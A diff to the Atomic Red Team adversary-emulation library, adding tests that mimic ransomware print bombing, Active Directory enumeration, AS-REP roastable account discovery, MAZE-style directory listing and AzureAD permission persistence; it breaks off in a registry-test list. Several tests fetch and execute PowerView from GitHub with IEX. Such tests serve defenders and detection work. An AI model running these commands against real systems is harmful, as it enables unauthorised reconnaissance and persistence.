@@ -137,4 +139,56 @@ Command line executed via suspicious invocation. Example is from the 2021 Threat
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing
+This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+See https://redcanary.com/blog/blackbyte-ransomware/.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_print | File to be opened/printed by Wordpad. | String | $env:temp&#92;T1059_003note.txt|
+| max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+```
+
+#### Cleanup Commands:
+```powershell
+stop-process -name wordpad -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: File to print must exist on disk at specified location (#{file_to_print})
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+```
+
+
+
+
 <br/>

atomics/T1059.003/T1059.003.yaml

@@ -71,3 +71,34 @@ atomic_tests:
     command: |
       %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
     name: command_prompt
+- name: Simulate BlackByte Ransomware Print Bombing
+  auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+  description: |
+    This test attempts to open a file a specified number of times in Wordpad, then prints the contents. 
+    It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
+    See https://redcanary.com/blog/blackbyte-ransomware/. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_to_print:
+      description: File to be opened/printed by Wordpad.
+      type: String
+      default: $env:temp\T1059_003note.txt
+    max_to_print:
+      description: The maximum number of Wordpad windows the test will open/print.
+      type: String
+      default: 75
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      File to print must exist on disk at specified location (#{file_to_print})
+    prereq_command: |
+      if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+    get_prereq_command: |
+      new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+  executor:
+    command: |
+      cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+    cleanup_command: |
+      stop-process -name wordpad -force -erroraction silentlycontinue
+    name: powershell

atomics/T1059.005/T1059.005.md

@@ -46,7 +46,6 @@ cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
 Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ```
 
@@ -60,9 +59,8 @@ if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
 New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
 ```
 
 

atomics/T1059.005/T1059.005.yaml

@@ -19,13 +19,11 @@ atomic_tests:
   - description: Sample script must exist on disk at specified location (#{vbscript})
     prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
     get_prereq_command: |-
-      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
       New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-      Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
   executor:
     command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
     cleanup_command: |-
-      Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
       Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
     name: powershell
 

atomics/T1069.002/T1069.002.md

@@ -22,6 +22,16 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr
 
 - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
 
+- [Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup](#atomic-test-9---enumerate-active-directory-groups-with-get-adgroup)
+
+- [Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-10---enumerate-active-directory-groups-with-adsisearcher)
+
+- [Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #12 - Get-DomainGroupMember with PowerView](#atomic-test-12---get-domaingroupmember-with-powerview)
+
+- [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)
+
 
 <br/>
 
@@ -308,4 +318,172 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup
+The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdGroup -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9f4e344b-8434-41b3-85b1-d38f29d148d0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+When successful, accounts that do not require kerberos pre-auth will be returned.
+Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined.
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually.
+```
+##### Description: Requires the Active Directory module for powershell to be installed.
+##### Check Prereq Commands:
+```powershell
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Get-DomainGroupMember with PowerView
+Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 46352f40-f283-4fe5-b56d-d9a71750e145
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #13 - Get-DomainGroup with PowerView
+Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5a8a181c-2c8e-478d-a943-549305a01230
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+```
+
+
+
+
+
+
 <br/>

atomics/T1069.002/T1069.002.yaml

@@ -133,3 +133,76 @@ atomic_tests:
     command: |
       #{adfind_path} -f (objectcategory=group)
     name: command_prompt
+- name: Enumerate Active Directory Groups with Get-AdGroup
+  auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+  description: |
+    The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      Get-AdGroup -Filter *
+- name: Enumerate Active Directory Groups with ADSISearcher
+  auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=group").FindAll(); ([adsisearcher]"objectcategory=group").FindOne()
+- name: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+  auto_generated_guid: 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+  description: |
+    When successful, accounts that do not require kerberos pre-auth will be returned.
+    Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
+  supported_platforms:
+    - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined.
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually.
+  - description: |
+      Requires the Active Directory module for powershell to be installed.
+    prereq_command: |
+      if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
+- name: Get-DomainGroupMember with PowerView
+  auto_generated_guid: 46352f40-f283-4fe5-b56d-d9a71750e145
+  description: |
+    Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
+    name: powershell 
+- name: Get-DomainGroup with PowerView
+  auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+  description: |
+    Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+    name: powershell 

atomics/T1083/T1083.md

@@ -14,6 +14,8 @@ Many command shell utilities can be used to obtain this information. Examples in
 
 - [Atomic Test #4 - Nix File and Directory Discovery 2](#atomic-test-4---nix-file-and-directory-discovery-2)
 
+- [Atomic Test #5 - Simulating MAZE Directory Enumeration](#atomic-test-5---simulating-maze-directory-enumeration)
+
 
 <br/>
 
@@ -170,4 +172,53 @@ rm #{output_file}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Simulating MAZE Directory Enumeration
+This test emulates MAZE ransomware's ability to enumerate directories using Powershell. 
+Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. 
+See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c6c34f61-1c3e-40fb-8a58-d017d88286d8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| File_to_output | File to output results to | String | $env:temp&#92;T1083Test5.txt|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
+Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
+Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
+Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
+$UsersFolder = "$env:homedrive\Users\"
+foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) 
+{
+foreach ($secondarydirectory in $folderarray)
+ {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
+}
+cat #{File_to_output}
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{File_to_output} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>

atomics/T1083/T1083.yaml

@@ -82,3 +82,32 @@ atomic_tests:
       find . -type f -name ".*"
     cleanup_command: 'rm #{output_file}'
     name: sh
+- name: Simulating MAZE Directory Enumeration
+  auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8
+  description: |
+    This test emulates MAZE ransomware's ability to enumerate directories using Powershell. 
+    Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. 
+    See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+  supported_platforms:
+  - windows
+  input_arguments:
+    File_to_output:
+      description: File to output results to
+      type: String
+      default: $env:temp\T1083Test5.txt
+  executor:
+    command: |
+      $folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
+      Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
+      Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
+      Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
+      $UsersFolder = "$env:homedrive\Users\"
+      foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) 
+      {
+      foreach ($secondarydirectory in $folderarray)
+       {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
+      }
+      cat #{File_to_output}
+    cleanup_command: |
+      remove-item #{File_to_output} -ErrorAction SilentlyContinue
+    name: powershell  

atomics/T1087.002/T1087.002.md

@@ -26,6 +26,10 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
 
 - [Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10---enumerate-active-directory-for-unconstrained-delegation)
 
+- [Atomic Test #11 - Get-DomainUser with PowerView](#atomic-test-11---get-domainuser-with-powerview)
+
+- [Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-12---enumerate-active-directory-users-with-adsisearcher)
+
 
 <br/>
 
@@ -441,4 +445,63 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #11 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 93662494-5ed7-4454-a04c-8c8372808ac2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher
+The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+Upon successful execution a listing of users will output with their paths in AD.
+Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 02e8be5a-3065-4e54-8cc8-a14d138834d3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
+```
+
+
+
+
+
+
 <br/>

atomics/T1087.002/T1087.002.yaml

@@ -214,3 +214,28 @@ atomic_tests:
     elevation_required: false
     command: |
       Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+
+- name: Get-DomainUser with PowerView
+  auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+    name: powershell
+- name: Enumerate Active Directory Users with ADSISearcher
+  auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
+    Upon successful execution a listing of users will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()

atomics/T1098/T1098.md

@@ -18,6 +18,8 @@
 
 - [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription)
 
+- [Atomic Test #8 - AzureAD - adding permission to application](#atomic-test-8---azuread---adding-permission-to-application)
+
 
 <br/>
 
@@ -542,4 +544,116 @@ Install-Module -Name Az.Resources -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - AzureAD - adding permission to application
+The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+You can also take a look at the materials:
+https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+https://github.com/reprise99/Sentinel-Queries
+https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| application_name | Name of the targed application | String | test_app|
+| application_permission | Permission from Microsoft Graph Resource API that will be add to application | String | DirectoryRecommendations.Read.All|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
+$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
+#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+
+#Get Service Principal of Microsoft Graph Resource API 
+$graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
+
+#Initialize RequiredResourceAccess for Microsoft Graph Resource API 
+$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
+$requiredGraphAccess.ResourceAppId = $graphSP.AppId
+$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
+
+#Set Application Permissions
+$ApplicationPermissions = @('#{application_permission}')
+
+$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
+if($reqPermission)
+{
+$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
+$resourceAccess.Type = "Role"
+$resourceAccess.Id = $reqPermission.Id    
+#Add required app permission
+$requiredGraphAccess.ResourceAccess.Add($resourceAccess)
+}
+else
+{
+Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
+}
+
+#Add required resource accesses
+$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
+$requiredResourcesAccess.Add($requiredGraphAccess)
+
+#Set permissions in existing Azure AD App
+Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
+
+$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
+
+New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
+
+$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
 <br/>

atomics/T1098/T1098.yaml

@@ -415,3 +415,103 @@ atomic_tests:
       Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
     name: powershell
     elevation_required: false
+
+- name: AzureAD - adding permission to application
+  auto_generated_guid: 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+  description: |
+    The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+    You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+    The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+    The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+    Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+    You can also take a look at the materials:
+    https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+    https://github.com/reprise99/Sentinel-Queries
+    https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+    https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    application_name:
+      description: Name of the targed application
+      type: String
+      default: test_app
+    application_permission:
+      description: Permission from Microsoft Graph Resource API that will be add to application
+      type: String
+      default: DirectoryRecommendations.Read.All
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
+      $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
+      #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+
+      #Get Service Principal of Microsoft Graph Resource API 
+      $graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
+
+      #Initialize RequiredResourceAccess for Microsoft Graph Resource API 
+      $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
+      $requiredGraphAccess.ResourceAppId = $graphSP.AppId
+      $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
+
+      #Set Application Permissions
+      $ApplicationPermissions = @('#{application_permission}')
+
+      $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
+      if($reqPermission)
+      {
+      $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
+      $resourceAccess.Type = "Role"
+      $resourceAccess.Id = $reqPermission.Id    
+      #Add required app permission
+      $requiredGraphAccess.ResourceAccess.Add($resourceAccess)
+      }
+      else
+      {
+      Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
+      }
+
+      #Add required resource accesses
+      $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
+      $requiredResourcesAccess.Add($requiredGraphAccess)
+
+      #Set permissions in existing Azure AD App
+      Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
+
+      $servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
+
+      New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
+
+    cleanup_command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+      Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+      
+    name: powershell
+    elevation_required: false

atomics/T1112/T1112.md

@@ -24,6 +24,56 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)
 
+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+
